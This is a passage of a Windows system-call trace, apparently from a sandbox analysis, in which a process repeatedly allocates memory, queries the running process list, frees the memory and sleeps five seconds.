Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.958] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.958] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.958] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.962] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.962] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.964] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.964] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.965] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.965] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.965] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.969] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.970] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.971] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.971] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.972] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.973] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.973] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.977] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.977] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.979] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.979] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.980] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.980] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.980] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.989] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.990] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.991] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.992] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.992] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.993] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.993] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.996] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.997] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.999] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.999] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.001] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.001] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.001] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.004] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.005] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.007] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.007] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.008] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.008] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.008] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.012] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.012] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.014] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.014] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.015] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.015] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.015] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.019] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.019] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.021] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.021] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.022] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.022] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.022] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.029] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.030] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.031] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.032] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.032] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.033] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.033] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.036] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.037] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.038] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.039] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.040] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.040] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.040] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.044] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.044] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.046] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.046] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.047] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.047] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.047] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.050] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.051] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.053] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.053] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.054] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.054] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.054] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.058] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.059] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.060] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.061] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.061] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.062] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.062] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.065] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.066] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.067] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.067] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.068] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.069] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.069] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.073] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.074] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.075] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.076] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.077] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.077] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.077] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.081] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.082] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.084] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.084] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.085] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.085] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.085] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.088] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.090] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.092] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.092] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.093] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.093] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.093] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.097] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.097] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.099] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.099] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.100] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.100] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.100] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.104] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.104] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.106] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.106] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.107] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.107] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.107] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.111] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.112] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.114] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.114] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.115] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.115] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.115] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.119] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.119] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) 